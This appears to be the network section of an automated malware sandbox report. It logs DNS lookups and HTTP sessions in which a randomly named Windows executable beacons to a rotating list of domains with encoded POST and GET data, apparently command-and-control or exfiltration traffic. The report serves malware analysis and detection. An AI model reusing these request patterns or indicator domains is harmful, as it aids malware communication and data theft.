                                  May 23, 2024 15:21:01.483669996 CEST53496111.1.1.1192.168.2.6
                                  May 23, 2024 15:21:15.690161943 CEST5053253192.168.2.61.1.1.1
                                  May 23, 2024 15:21:15.735146046 CEST53505321.1.1.1192.168.2.6
                                  May 23, 2024 15:21:30.032669067 CEST5713253192.168.2.61.1.1.1
                                  May 23, 2024 15:21:30.217411041 CEST53571321.1.1.1192.168.2.6
                                  May 23, 2024 15:21:43.735953093 CEST6187553192.168.2.61.1.1.1
                                  May 23, 2024 15:21:43.943917036 CEST53618751.1.1.1192.168.2.6
                                  May 23, 2024 15:21:58.329289913 CEST5830653192.168.2.61.1.1.1
                                  May 23, 2024 15:21:58.456868887 CEST53583061.1.1.1192.168.2.6
                                  May 23, 2024 15:22:11.766572952 CEST6286053192.168.2.61.1.1.1
                                  May 23, 2024 15:22:11.816402912 CEST53628601.1.1.1192.168.2.6
                                  May 23, 2024 15:22:26.079948902 CEST6070353192.168.2.61.1.1.1
                                  May 23, 2024 15:22:26.099338055 CEST53607031.1.1.1192.168.2.6

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  May 23, 2024 15:18:49.648089886 CEST192.168.2.61.1.1.10x28a5Standard query (0)www.emgeecontracting.shopA (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:05.345263958 CEST192.168.2.61.1.1.10xfa70Standard query (0)www.upshercode.storeA (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:19.329221964 CEST192.168.2.61.1.1.10x95a8Standard query (0)www.botcsllc.comA (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:32.751833916 CEST192.168.2.61.1.1.10x349fStandard query (0)www.darkerberrycoffee.comA (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:46.276344061 CEST192.168.2.61.1.1.10xc559Standard query (0)www.featurasandals.comA (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:59.658524990 CEST192.168.2.61.1.1.10xb1abStandard query (0)www.anoldshow.topA (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:14.599570036 CEST192.168.2.61.1.1.10xed7eStandard query (0)www.badcopsinyourtown.infoA (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:29.361541033 CEST192.168.2.61.1.1.10xf765Standard query (0)www.autonomyai.xyzA (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:42.785188913 CEST192.168.2.61.1.1.10x34f9Standard query (0)www.brzuszkiewicz.plA (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:01.188491106 CEST192.168.2.61.1.1.10x91adStandard query (0)www.novosti-dubai.ruA (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:15.690161943 CEST192.168.2.61.1.1.10x44bcStandard query (0)www.ilodezu.comA (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:30.032669067 CEST192.168.2.61.1.1.10xe732Standard query (0)www.kubanci.ruA (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:43.735953093 CEST192.168.2.61.1.1.10x754eStandard query (0)www.dvizhenie-pallet.ruA (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:58.329289913 CEST192.168.2.61.1.1.10xee3aStandard query (0)www.szandraromanovics.huA (IP address)IN (0x0001)false
                                  May 23, 2024 15:22:11.766572952 CEST192.168.2.61.1.1.10xd799Standard query (0)www.fruitique.co.ukA (IP address)IN (0x0001)false
                                  May 23, 2024 15:22:26.079948902 CEST192.168.2.61.1.1.10x5469Standard query (0)www.isrninjas.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  May 23, 2024 15:18:49.668534040 CEST1.1.1.1192.168.2.60x28a5No error (0)www.emgeecontracting.shopemgeecontracting.shopCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:18:49.668534040 CEST1.1.1.1192.168.2.60x28a5No error (0)emgeecontracting.shop69.57.162.24A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:05.824011087 CEST1.1.1.1192.168.2.60xfa70No error (0)www.upshercode.storeupshercode.storeCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:19:05.824011087 CEST1.1.1.1192.168.2.60xfa70No error (0)upshercode.store162.240.81.18A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:19.616153002 CEST1.1.1.1192.168.2.60x95a8No error (0)www.botcsllc.com216.40.34.41A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:32.763287067 CEST1.1.1.1192.168.2.60x349fNo error (0)www.darkerberrycoffee.comdarkerberrycoffee.comCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:19:32.763287067 CEST1.1.1.1192.168.2.60x349fNo error (0)darkerberrycoffee.com3.33.130.190A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:32.763287067 CEST1.1.1.1192.168.2.60x349fNo error (0)darkerberrycoffee.com15.197.148.33A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:46.303020954 CEST1.1.1.1192.168.2.60xc559No error (0)www.featurasandals.com104.21.28.203A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:46.303020954 CEST1.1.1.1192.168.2.60xc559No error (0)www.featurasandals.com172.67.147.144A (IP address)IN (0x0001)false
                                  May 23, 2024 15:19:59.936491013 CEST1.1.1.1192.168.2.60xb1abNo error (0)www.anoldshow.top203.161.43.228A (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:14.631174088 CEST1.1.1.1192.168.2.60xed7eNo error (0)www.badcopsinyourtown.infobadcopsinyourtown.infoCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:20:14.631174088 CEST1.1.1.1192.168.2.60xed7eNo error (0)badcopsinyourtown.info3.33.130.190A (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:14.631174088 CEST1.1.1.1192.168.2.60xed7eNo error (0)badcopsinyourtown.info15.197.148.33A (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:29.386336088 CEST1.1.1.1192.168.2.60xf765No error (0)www.autonomyai.xyzautonomyai.xyzCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:20:29.386336088 CEST1.1.1.1192.168.2.60xf765No error (0)autonomyai.xyz3.33.130.190A (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:29.386336088 CEST1.1.1.1192.168.2.60xf765No error (0)autonomyai.xyz15.197.148.33A (IP address)IN (0x0001)false
                                  May 23, 2024 15:20:42.859942913 CEST1.1.1.1192.168.2.60x34f9No error (0)www.brzuszkiewicz.pl185.253.212.22A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:01.483669996 CEST1.1.1.1192.168.2.60x91adNo error (0)www.novosti-dubai.ru87.236.16.214A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:15.735146046 CEST1.1.1.1192.168.2.60x44bcNo error (0)www.ilodezu.com188.114.96.3A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:15.735146046 CEST1.1.1.1192.168.2.60x44bcNo error (0)www.ilodezu.com188.114.97.3A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:30.217411041 CEST1.1.1.1192.168.2.60xe732No error (0)www.kubanci.ru194.58.112.174A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:43.943917036 CEST1.1.1.1192.168.2.60x754eNo error (0)www.dvizhenie-pallet.ru5.101.153.149A (IP address)IN (0x0001)false
                                  May 23, 2024 15:21:58.456868887 CEST1.1.1.1192.168.2.60xee3aNo error (0)www.szandraromanovics.huszandraromanovics.huCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:21:58.456868887 CEST1.1.1.1192.168.2.60xee3aNo error (0)szandraromanovics.hu92.118.24.161A (IP address)IN (0x0001)false
                                  May 23, 2024 15:22:11.816402912 CEST1.1.1.1192.168.2.60xd799No error (0)www.fruitique.co.uk212.227.172.253A (IP address)IN (0x0001)false
                                  May 23, 2024 15:22:26.099338055 CEST1.1.1.1192.168.2.60x5469No error (0)www.isrninjas.comisrninjas.comCNAME (Canonical name)IN (0x0001)false
                                  May 23, 2024 15:22:26.099338055 CEST1.1.1.1192.168.2.60x5469No error (0)isrninjas.com3.33.130.190A (IP address)IN (0x0001)false
                                  May 23, 2024 15:22:26.099338055 CEST1.1.1.1192.168.2.60x5469No error (0)isrninjas.com15.197.148.33A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • www.emgeecontracting.shop
                                  • www.upshercode.store
                                  • www.botcsllc.com
                                  • www.darkerberrycoffee.com
                                  • www.featurasandals.com
                                  • www.anoldshow.top
                                  • www.badcopsinyourtown.info
                                  • www.autonomyai.xyz
                                  • www.brzuszkiewicz.pl
                                  • www.novosti-dubai.ru
                                  • www.ilodezu.com
                                  • www.kubanci.ru
                                  • www.dvizhenie-pallet.ru
                                  • www.szandraromanovics.hu
                                  • www.fruitique.co.uk
                                  • www.isrninjas.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.64970569.57.162.24803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:18:49.680830002 CEST500OUTGET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:18:50.298168898 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Thu, 23 May 2024 13:18:50 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 23, 2024 15:18:50.303018093 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.649706162.240.81.18803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:05.833611965 CEST754OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42
                                  Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
                                  May 23, 2024 15:19:06.404011011 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:06 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:06.405716896 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:06.410917997 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:06.410933971 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.649707162.240.81.18803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:08.371110916 CEST778OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 4e 43 71 74 44 37 39 6e 72 33 4c 6f 2b 56 6a 38 6d 79 56 37 46 70 54 43 39 41 38 57 56 67 55 38 5a 55 42 36 49 37 79 62 4d 37 52 46 73 78 48 50 62 6a 77 55 45 35 79 6e 49 77 38 63 57 70 35 69 41 6f 63 58 55 61 76 6d 2b 44 74 44 6e 46 51 77 56 32 33 52 77 4b 4d 47 67 34 41 64 77 54 51 78 70 6a 38 59 6b 2b 79 49 6e 6d 46 59 51 41 2f 41 42 78 47 61 71 50 73 2f 74 46 46 55 65 30 78 78 54 79 48 7a 42 69 4b 59 33 62 79 37 47 2f 77 49 5a 78 6b 51 68 61 74 69 73 31 68 61 72 74 6b 76 76 69 6c 36 34 58 46 66 67 6b 51 4c 32 53 76 6b 6a 37 6f 6c 63 63 39 41 3d 3d
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mNCqtD79nr3Lo+Vj8myV7FpTC9A8WVgU8ZUB6I7ybM7RFsxHPbjwUE5ynIw8cWp5iAocXUavm+DtDnFQwV23RwKMGg4AdwTQxpj8Yk+yInmFYQA/ABxGaqPs/tFFUe0xxTyHzBiKY3by7G/wIZxkQhatis1hartkvvil64XFfgkQL2Svkj7olcc9A==
                                  May 23, 2024 15:19:08.944555044 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:19:08 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:19:08.945955038 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                  May 23, 2024 15:19:08.949326038 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                  May 23, 2024 15:19:08.949333906 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.649708162.240.81.18803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:10.900278091 CEST1791OUTPOST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 56 43 71 66 37 37 38 45 7a 33 4b 6f 2b 56 39 73 6d 78 56 37 46 30 54 43 31 45 38 57 5a 65 55 36 64 55 41 5a 41 37 77 70 6f 37 59 46 73 78 49 76 62 69 2b 30 46 78 79 6e 59 4b 38 63 47 70 35 69 41 6f 63 52 59 61 73 79 53 44 76 44 6e 45 54 77 56 36 7a 52 77 75 4d 47 35 46 41 64 30 70 51 43 68 6a 39 34 30 2b 69 71 2f 6d 48 34 51 43 38 41 42 35 47 61 6e 58 73 2f 67 36 46 55 71 65 78 79 50 79 47 46 73 57 61 36 75 4d 73 62 4b 6a 74 37 39 72 67 56 5a 33 69 44 4d 51 68 4a 58 6c 6d 50 6a 62 70 74 59 4f 47 75 6f 6c 48 36 79 61 6b 6b 43 33 39 57 74 6c 68 34 70 33 39 4f 78 4b 36 52 5a 2f 52 7a 44 47 65 73 71 38 4f 39 46 73 31 59 71 53 6f 35 4d 44 49 63 38 50 4f 66 78 4a 68 31 55 76 64 50 67 6a 62 32 68 61 45 30 46 54 65 64 36 38 45 33 7a 6c 62 33 4c 71 5a 43 48 53 6c 69 67 70 72 61 42 73 64 41 79 39 46 70 73 30 49 68 62 56 42 78 37 52 6c 51 78 76 67 4d 31 78 43 38 62 48 66 [TRUNCATED]
